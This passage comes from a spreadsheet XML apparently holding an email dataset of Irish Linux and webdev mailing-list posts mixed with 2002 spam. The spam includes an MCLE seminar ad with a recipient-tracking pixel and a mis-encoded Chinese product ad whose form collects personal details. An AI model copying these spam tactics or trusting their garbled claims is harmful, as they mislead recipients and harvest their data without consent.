 &lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;&lt;A HREF="http://202.108.221.18/www425/"&gt;CLICK HERE FOR FORM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=1 PTSIZE=8 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;I&lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=1 PTSIZE=8 FAMILY="SANSSERIF" FACE="Tahoma" LANG="0"&gt;f you no longer wish to receive any of our mailings you may be &lt;BR&gt;
 permanently removed by&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=1 PTSIZE=8 FAMILY="SANSSERIF" FACE="Tahoma" LANG="0"&gt; &lt;A HREF="http://202.108.221.18/www425/takemeoff.html"&gt;Clicking Here&lt;/A&gt;.&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#ffff80" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=1 PTSIZE=8 FAMILY="SANSSERIF" FACE="Tahoma" LANG="0"&gt;If there has been any inconvenience we apologize.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=1 PTSIZE=8 FAMILY="SANSSERIF" FACE="Tahoma" LANG="0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#000000" style="BACKGROUND-COLOR: #000000" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Tahoma" LANG="0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;/P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;
  [BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Webdev] PHP/MySQL Virtual Hosting Recommendations?
</t>
  </si>
  <si>
    <t xml:space="preserve">At 07:44 PM 21/08/2002 +0100, elvin@eircom.net wrote:
 &gt;Circa 50MB-100MB web space for now
 &gt;POP email accounts
 &gt;Account Control Panel
 &gt;Perl
 &gt;PHP
 &gt;MySQL
 &gt;FTP and Telnet Access 24/7
 You'll be lucky to get telnet anywhere, SSH should do though.
 &gt;Own CGI-BIN
 &gt;Webalizer Graphical Stats
 &gt;Server Side Includes
 &gt;Good Reachable Technical Support
 &gt;
 &gt;I have seen a great looking 300MB solution in the region of 600Euro p.a. 
 &gt;which at the moment is a bit over my financial head in one payment - I 
 &gt;haven't completed any sites yet, but have a few potential jobs coming up.
 &gt;
 &gt;Any tips/pointers much appreciated!
 Try www.hosting365.ie - they haven't let me down yet.
 You could try iewebs.com aswell, though I don't know if they do "just hosting".
 Lee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
 --
 PLEELEY (adj.)
 Descriptive of a drunk person's attempt to be endearing.
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 22, 2002 at 10:58:34PM +0200, Robert Harley wrote:
 &gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
 &gt; 
 &gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
 http://www.snopes.com/quotes/bush.htm
 Claim:   President George W. Bush proclaimed, "The problem with
 the French is that they don't have a word for entrepreneur."
 Status:   False.
 Origins:   Yet another French fried "George W. Bush is dumb"
 story has been taken up by those who like their caricatures
 drawn in stark, bold lines. According to scuttlebutt that
 emerged in the British press in July 2002, President Bush,
 Britain's Prime Minister Tony Blair, and France's President
 Jacques Chirac were discussing economics and, in particular,
 the decline of the French economy. "The problem with the
 French," Bush afterwards confided in Blair, "is that they don't
 have a word for entrepreneur."
 The source was Shirley Williams, also known as the Baroness
 Williams of Crosby, who claimed "my good friend Tony Blair" had
 recently regaled her with this anecdote in Brighton.
 Lloyd Grove of The Washington Post was unable to reach Baroness
 Williams to gain her confirmation of the tale, but he did
 receive a call from Alastair Campbell, Blair's director of
 communications and strategy. "I can tell you that the prime
 minister never heard George Bush say that, and he certainly
 never told Shirley Williams that President Bush did say it,"
 Campbell told The Post. "If she put this in a speech, it must
 have been a joke."
 This is far from the first time Bush has been made the butt of
 a jibe meant to showcase what some perceive as his less than
 stellar intellectual abilities. Without straining our memories
 too hard, we can come up with three other instances we've
 chronicled on this site. In the summer of 2001, the joke of the
 moment centered upon a supposed study that had resulted in the
 ranking of Presidential IQs, with George W. Bush being pegged
 as the Chief Executive who scraped the bottom of the
 intelligence barrel. In December 2000 it was a fake Nostradamus
 quatrain which pontificated that the "village idiot" would win
 the 2000 Presidential election. And in the spring of 2002, it
 was the story of Bush's waving at Stevie Wonder that set folks
 to chortling up their sleeves.
 Stories that illustrate this widely believed intellectual
 shortcoming will always waft after George W. Bush because they
 seemingly confirm what many already hold as true about this
 public figure, that he's not the brightest fellow that's ever
 been. It is human nature to revel in yarns that the hearer at
 some level agrees with, thus tales of this sort will always
 fall upon appreciative ears.
 Barbara "ears of corn" Mikkelson
 Last updated:   29 July 2002
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 06:54:28AM +0100, Anders Holm mentioned:
 &gt; let me guess, you haven't tried the boot parameter root=/dev/hda2 if you
 &gt; are using lilo??
  Ah, you see - cobalt's don't use lilo. They have an openboot-like prom
 that looks in an ext2 partition in /dev/hda1 for a file called
 /boot/vmlinux.gz - nothing else.
  The only way I think you can set parameters is with a "set_params" line.
  However, when I run 
     set_params root=/dev/hda2
  and then run:
     bfd /boot/vmlinux.gz
  It boots the old kernel, I assume from the prom. It seems to do this, if
 something goes wrong - no error, just boots the default kernel.
  BTW, 'bfd' means 'boot from disk'.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: QOTD: Inside me there's a thin woman screaming to get out...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: "KOLE,JOHN P (HP-FtCollins,ex1)" &lt;john_kole@am.exch.hp.com&gt;
 From: Bell Lori [mailto:loribell01@yahoo.com]
 Inside me there's a thin woman screaming to get out --
 But I can usually shut the bitch up with some chocolate. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: MCLE Seminars
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;MCLE Seminars&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#990033" vlink="#000066" alink="#FF0000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top"&gt; 
 &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;Click 
             &lt;a href="http://www.askthelawyers.com/apps/remove.asp?email=webmaster@efi.ie"&gt;here&lt;/a&gt; 
             to be removed from our email list. You can also send an &lt;a href="mailto:remove@attorneysonlineinc.com?subject=Remove"&gt;email&lt;/a&gt; or call us toll-free at (800) 456-6060&lt;/font&gt;&lt;/p&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/top.gif" width="600" height="39"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/bar.gif" width="600" height="75"&gt;&lt;br&gt;
             &lt;img src="http://www.attorneyconnectionsinc.com/email/pic.jpg" width="600" height="126"&gt; 
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="10"&gt;
         &lt;tr&gt; 
           &lt;td width="300" align="left" valign="top"&gt; 
             &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;July 
               6-7 , 2002&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
               Cost: &lt;font color="#990000"&gt;$795&lt;font size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
               Held at the HILTON Waikola Village, &lt;/font&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Hawaii&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#990033"&gt; 
               Register and pay by June 7 and recieve 10% off! ($715.50)&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;font color="#FF0000"&gt;&lt;font color="#333399" size="1"&gt;*&lt;/font&gt;&lt;font color="#333399"&gt;&lt;font size="1"&gt;air, 
               hotel, and activities not included&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
           &lt;td width="300" align="left" valign="top"&gt; 
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#333399" size="2"&gt;&lt;i&gt;&lt;b&gt;&lt;font color="#000000"&gt;&amp;quot;The 
               presentation was extremely informative and entertaining.&amp;quot; &lt;/font&gt;&lt;/b&gt;&lt;/i&gt; 
               &lt;/font&gt; &lt;/p&gt;
             &lt;p&gt;&lt;font size="2" color="#000000" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i&gt;&lt;b&gt;&amp;quot;Fun 
               for the whole family... A great reason to take a vacation!&amp;quot;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt;
           &lt;td height="20"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td valign="middle" align="center" bgcolor="#333399"&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#FFFFFF"&gt;&lt;font size="2"&gt;**** 
             &lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#FFFFFF"&gt;Limited Space Available 
             &lt;font size="2"&gt;****&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td height="10"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td valign="top" align="left"&gt; 
             &lt;table width="600" border="0" cellspacing="0" cellpadding="10"&gt;
               &lt;tr&gt;
                 &lt;td valign="middle" align="center"&gt; 
                   &lt;table width="100%" border="1" height="71" cellpadding="1" cellspacing="0" bordercolor="#333399"&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" height="16" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Hours&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="16" valign="middle"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;&lt;b&gt;&lt;font size="2"&gt;Includes 
                         12.5 hours of participatory:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;6.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt; 
                         Ethics&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;3.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Substance 
                         Abuse&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle" height="5"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.5&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle" height="5"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Emotional 
                         Distress&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" height="3" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="3" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Elimination 
                         of Bias in the Legal Profession&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center"&gt; 
                       &lt;td width="37" height="2" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="2" align="left" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;General 
                         Legal Education&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center"&gt; 
                       &lt;td colspan="2" valign="middle"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt; 
                         &lt;font size="2"&gt;&lt;b&gt;Audio Materials for remaining MCLE &lt;br&gt;
                         credits will be available at the seminar.&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td valign="middle" align="center"&gt; 
                   &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#333399"&gt;&lt;b&gt;Brought 
                     to you by:&lt;br&gt;
                     &lt;/b&gt;&lt;/font&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/logo.gif" width="250" height="117"&gt;&lt;/p&gt;
                   &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="3"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt; 
                   &lt;table width="600" border="0" cellspacing="0" cellpadding="5"&gt;
                     &lt;tr&gt;
                       &lt;td align="center" valign="top"&gt; 
                         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                         &lt;/td&gt;
                       &lt;td align="left" valign="middle"&gt; 
                         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font size="4"&gt;Bar 
                           Approved Curriculum&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Approved 
                           by Arizona, Arkansas, California, Georgia, Idaho, Iowa, 
                           Kansas, Louisiana, Maine, Missouri, Montana, Nevada, 
                           New Hampshire, New Mexico, North Carolina, North Dakota, 
                           Oregon, Pennsylvania, South Carolina, Tennesee, Texas, 
                           Utah, Virginia, Washington State, and Wisconsin Bar 
                           Associations. Approval pending for Alabama and Minnesota.&lt;/font&gt;&lt;/p&gt;
                         &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;table width="100%" border="1" cellspacing="0" cellpadding="4" bordercolor="#000000"&gt;
               &lt;tr&gt; 
                 &lt;td align="center" valign="middle" bgcolor="#000099"&gt; 
                   &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3" color="#FFFFFF"&gt;&lt;b&gt;Call 
                     &lt;font size="4"&gt; Attorney Connections&lt;/font&gt; at &lt;font size="4"&gt;(800) 
                     221-8424&lt;/font&gt; &lt;br&gt;
                     to reserve your package today!&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
                   &lt;p&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;OR: 
                     &lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.attorneyconnectionsinc.com/registration.htm" style="color:gold
 " target="_blank"&gt;Click here to print&lt;/a&gt; the reservation form and fax to &lt;font color="#FFCC99"&gt;(760) 
                     731-7785&lt;/font&gt;; or &lt;br&gt;
                     mail to: Attorney Connections, P.O. Box 1533, Bonsall, CA 
                     92003&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;img src="http://www.askthelawyers.com/email.asp?email=webmaster@efi.ie&amp;campaign=80" width="1" height="1"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; On Thu, 22 Aug 2002, John P. Looney wrote:
 &gt; &gt;  Sun's hardware in general is more reliable,
 &gt; ROFL. not in our experience.
 Well at least our Caps-Lock keys work:
 peter@staunton.ie said:
 &gt; Another problem. I have a Dell branded keyboard and if I hit Caps-Lock
 &gt; twice, the whole machine crashes (in Linux, not Windows) - even the on/
 &gt; off switch is inactive, leaving me to reach for the power cable
 &gt; instead.
 :-P
 bauwolf@indigo.ie said:
 &gt; as if he wanted Solaris 9 for x86, he'd be waiting a bit
 erm... it runs Solaris x86 as standard...
 Cheers,
 ~Al
 -- 
 Expressed in this posting are my opinions.  They are in no way related
 to opinions held by my employer, Sun Microsystems.
 Statements on Sun products included here are not gospel and may
 be fiction rather than truth.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ﵽvAwrY̨ο
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=big5"&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;&lt;FONT size=2&gt;
 &lt;FONT size=2&gt;
 &lt;DIV align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000 
 size=5&gt;&lt;B&gt;ﵽvAwrY̨ο&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;UL&gt;
   &lt;LI&gt;&lt;FONT size=3&gt;&lt;STRONG&gt;¤ѵMӪصѨAøgHճqLALƧ@ΡC&lt;/STRONG&gt;&lt;/FONT&gt; 
   &lt;LI&gt;&lt;FONT size=3&gt;&lt;STRONG&gt;a 1992~_ʰڵoiȵP 1993~wīO`P  
   C&lt;/STRONG&gt;&lt;/FONT&gt; 
   &lt;LI&gt;&lt;FONT size=3&gt;&lt;STRONG&gt;ٽۦr0502983֭ͲADaUtͲDk~C&lt;/STRONG&gt;&lt;/FONT&gt; 
   &lt;LI&gt;&lt;FONT size=3&gt;&lt;STRONG&gt;ﵽvĪGΡAGgYiPﵽġC&lt;/STRONG&gt;&lt;/FONT&gt; 
   &lt;LI&gt;&lt;FONT size=3&gt;&lt;STRONG&gt;AͷsvĪGtAGܤTӤYisvC&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT size=3&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;g`ť즳HYvVӶVYA ib[NӧYN[JrY@ڡCzO_]{P˪DHoتpjhoͦb~kʨWA  
 ֦kʷ|oDCDn]OkʲXyC&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;ʿE|EY֥֯׸coסA YLkĲMA h|nb֤UתռhA yniѵêA iӨYveC&lt;/DIV&gt; 
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;kڨsA ѨMDA ̭nOhloײMA ²檺kNOG&lt;BR&gt;(1). g`~Y&lt;BR&gt;(2). ܦXA~v  
 &lt;BR&gt;(3). ֬VBSv &lt;BR&gt;(4). A׫Y( ΤY֪vޮYYi ) &lt;BR&gt;(5). ܹYvq&lt;BR&gt;(6).  
 u}ivGB ;vC&lt;BR&gt;&lt;/DIV&gt; 
 &lt;DIV&gt;&lt;BR&gt;;v~A˱z̨Ϊ~G &lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;y_nivGz}ǲΰtAѨȧAHѡA󭺯QAkAK.QƺجöQѵMӪհtӦAgٽۦr0502983֭AøgLFDAAΥy{RIPTHֽLEwAҹ䤤PivͪΧﵽL`AvLqGִSeBMntq״IC&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;BR&gt;ʨrOѩʸcAିEAbY֤Eo֯׼W͡AO׷ʲvD]Cy_nivGzt״ILq -  
 MnAPiGyJէֳtMWͪ׽AﵽvͲzҡAv۵MͪAYYVaAٱzC&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;ϥΡy_nivGznObYv~bAߧYQrBUAëƤAPilAǫήĪGC&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;
 &lt;DIV&gt;&lt;BR&gt;δf͡ARGe@jذeAZʶR&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;UL&gt;
   &lt;LI&gt;@~]NT1,600)GYذe²@vU&lt;/LI&gt;&lt;/UL&gt;
 &lt;BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px"&gt;
   &lt;BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px"&gt;
     &lt;BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px"&gt;
       &lt;BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px"&gt;
         &lt;DIV&gt;&lt;/FONT&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;e]tG&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
         &lt;OL&gt;
           &lt;LI&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;ФvͪgC&lt;/FONT&gt; &lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;UvC&lt;/FONT&gt; &lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;ʨrgsC&lt;/FONT&gt; &lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;Ov`ѡC&lt;/FONT&gt; &lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT size=2&gt;&lt;FONT 
       size=3&gt;u};v~СC&lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/OL&gt;&lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;
 &lt;UL&gt;
   &lt;LI dir=ltr&gt;&lt;FONT size=2&gt;&lt;FONT size=3&gt;T~]NT3,200 )  
   Gذe²@vU~A멳eqʦA[ذŴӪج~v@~C&lt;/FONT&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3&gt;w&lt;/FONT&gt;&lt;FONT size=3&gt;gHUqʳqʡG&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;H1 align=center&gt;q&lt;/H1&gt;
 &lt;DIV&gt;
 &lt;HR align=center SIZE=5&gt;
 &lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;FORM action=http://f2m.aac.com.tw/f2m.php?F=1020998671 method=post&gt;&lt;INPUT 
 type=hidden value=W name=SOB&gt; 
 &lt;TABLE width=697&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;mW&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT size=15 name=Contact_FullName&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;Xͦ~&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT size=15 name=Contact_Birth&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;a}&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT size=37 name=Contact_Address&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;lϸ&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT maxLength=12 size=12 name=Contact_ZipCode&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;I&gt;ƱeF&lt;/I&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT type=radio CHECKED value=morning name=time&gt; 
       W0900~1200 &lt;INPUT type=radio value=afternoon name=time&gt; U1200~1700  
       &lt;INPUT type=radio value=night name=time&gt; ߶1700~2100 &lt;/TD&gt;&lt;/TR&gt; 
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;pq&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT maxLength=25 size=25 name=Contact_Phone&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=right width=94&gt;&lt;EM&gt;&lt;/EM&gt;&lt;/TD&gt;
     &lt;TD width=591&gt;&lt;INPUT maxLength=25 size=25 name=Hand_phone&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
